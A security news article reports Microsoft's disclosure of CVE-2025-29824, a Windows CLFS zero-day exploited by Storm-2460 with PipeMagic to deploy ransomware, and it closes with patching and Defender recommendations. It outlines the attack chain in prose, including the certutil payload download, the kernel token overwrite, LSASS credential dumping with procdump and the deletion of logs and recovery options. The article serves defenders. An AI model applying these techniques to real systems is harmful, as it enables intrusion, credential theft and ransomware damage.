Microsoft has reported the discovery of a zero-day elevation of privilege vulnerability in the Windows Common Log File System (CLFS) that has been actively exploited by threat actors in targeted ransomware campaigns.
This vulnerability, tracked as CVE-2025-29824, was addressed in a security update released on April 8, 2025.
The exploitation activity has been attributed to Storm-2460, a threat group using the PipeMagic malware to deploy ransomware.
Technical Details of CVE-2025-29824 and Exploitation
The identified vulnerability resides in the CLFS kernel driver and allows attackers with standard user privileges to escalate to full system privileges.
Storm-2460 has leveraged this vulnerability in a sophisticated attack chain.
While the exact initial access vectors remain unclear, Microsoft observed the attackers using the certutil utility to download a malicious MSBuild file from compromised third-party websites.
This file, carrying an encrypted payload, enabled the deployment of PipeMagic malware, previously documented in ransomware activity.
Once the malware was deployed, the attackers executed the CLFS exploit in memory via the dllhost.exe process.
The exploit leveraged a flaw in the CLFS driver to leak kernel addresses using the NtQuerySystemInformation API.
It then escalated privileges by exploiting memory corruption using the RtlSetAllBits API to overwrite the process token, enabling the execution of SYSTEM-level commands and process injection.
However, Microsoft’s mitigation efforts in Windows 11, version 24H2 restricting certain system information classes to admin-like users effectively neutralized this exploit on updated systems.
Ransomware Deployment and Post-Exploitation Behavior
After successfully exploiting the CLFS vulnerability, Storm-2460 injected a payload into the winlogon.exe process and used the Sysinternals procdump.exe tool to extract credentials from the LSASS memory.
This facilitated broader network access, ultimately leading to the deployment of ransomware.
Files on the victim systems were encrypted with random file extensions, accompanied by a ransom note named !READ_ME_REXX2!.txt.
The ransomware activity was associated with the domains tied to the RansomEXX ransomware family.
To amplify the damage, the attackers executed commands to disable recovery options and delete system logs, further complicating recovery efforts.
Microsoft has strongly urged organizations to apply the latest security updates immediately and has reiterated the importance of proactive defense measures.
According to the Report, Customers running Windows 11, version 24H2 are not affected by the exploit due to additional mitigations introduced in this version.
Recommendations for mitigation include utilizing Microsoft Defender’s advanced features, such as turning on cloud-delivered protection, running Endpoint Detection and Response (EDR) in block mode, and enabling automated investigation and remediation capabilities.
Organizations are also encouraged to improve their visibility into their network using device discovery tools and to deploy attack surface reduction rules to prevent common ransomware tactics.
This incident underscores the critical importance of timely patching and advanced detection strategies to defend against sophisticated ransomware campaigns leveraging zero-day vulnerabilities.
Microsoft continues to collaborate with industry partners to analyze and mitigate emerging threats.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
